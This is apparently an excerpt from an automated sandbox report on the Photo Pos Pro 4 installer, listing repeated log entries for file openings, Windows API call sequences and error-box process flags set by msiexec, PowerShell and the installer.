                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_0041CB15 CreateMutexA,GetLastError,FindWindowA,IsIconic,ShowWindow,SetForegroundWindow,6_2_0041CB15
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_0041CB15 CreateMutexA,GetLastError,FindWindowA,IsIconic,ShowWindow,SetForegroundWindow,14_2_0041CB15
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_0041B027 CreateFileA,SetFilePointer,SetFilePointer,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,CloseHandle,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetFilePointer,CloseHandle,DeleteFileA,CloseHandle,CloseHandle,6_2_0041B027
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Installer\MSID82B.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeProcess information set: NOOPENFILEERRORBOX
